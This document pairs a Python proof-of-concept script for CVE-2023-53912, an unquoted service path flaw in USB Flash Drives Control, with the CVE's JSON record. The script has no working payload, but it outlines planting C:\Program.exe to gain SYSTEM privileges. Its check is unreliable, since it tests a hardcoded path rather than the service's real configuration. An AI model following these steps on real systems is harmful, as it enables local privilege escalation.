CVE-2023-53912

#!/usr/bin/env python3 # CVE-2023-53912 PoC - USB Flash Drives Control Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability # Author: Security Researcher # Note: This is for educational and authorized testing purposes only import os import sys import subprocess def check_vulnerability(): """ Check if the target system is vulnerable to CVE-2023-53912 """ target_service = "USB Flash Drives Control" vulnerable_path = r"C:\Program Files\USB Flash Drives Control\usbcs.exe" # Check if the service exists try: result = subprocess.run( ['sc', 'query', target_service], capture_output=True, text=True ) if result.returncode != 0: print(f"[-] Service '{target_service}' not found") return False except Exception as e: print(f"[-] Error checking service: {e}") return False # Check if path is unquoted (vulnerability check) path_components = vulnerable_path.split('\\') for i, component in enumerate(path_components): if ' ' in component: print(f"[!] VULNERABLE: Unquoted path component found: {component}") print(f"[!] Attacker can place malicious executable at: {path_components[0]}\\{component}.exe") return True return False def create_payload(payload_path): """ Create a simple reverse shell payload for demonstration In real attack, this would be a more sophisticated malware """ # This is a placeholder - in real attack, attacker would create actual malware print(f"[*] In a real attack, malicious executable would be created at: {payload_path}") print("[*] When service restarts, the malicious code executes with SYSTEM privileges") if __name__ == "__main__": print("=" * 60) print("CVE-2023-53912 - USB Flash Drives Control Unquoted Service Path") print("=" * 60) if not os.name == 'nt': print("[-] This exploit only works on Windows systems") sys.exit(1) print("\n[*] Checking for vulnerability...") if check_vulnerability(): print("\n[!] Target is VULNERABLE to CVE-2023-53912") print("\n[*] Attack vector:") print(" 1. Attacker places malicious Program.exe in C:\\") print(" 2. Wait for service restart or trigger restart") print(" 3. Malicious code executes with SYSTEM privileges") # Demonstrate the attack path create_payload(r"C:\Program.exe") else: print("\n[-] Target does not appear to be vulnerable")

{"cve": {"id": "CVE-2023-53912", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:49.657", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "USB Flash Drives Control 4.1.0.0 contains an unquoted service path vulnerability in its service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\USB Flash Drives Control\\usbcs.exe' to inject malicious executables and escalate privileges on Windows systems."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://binisoft.org/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51508", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/usb-flash-drives-control-unquoted-service-path-privilege-escalation", "source": "[email protected]"}]}}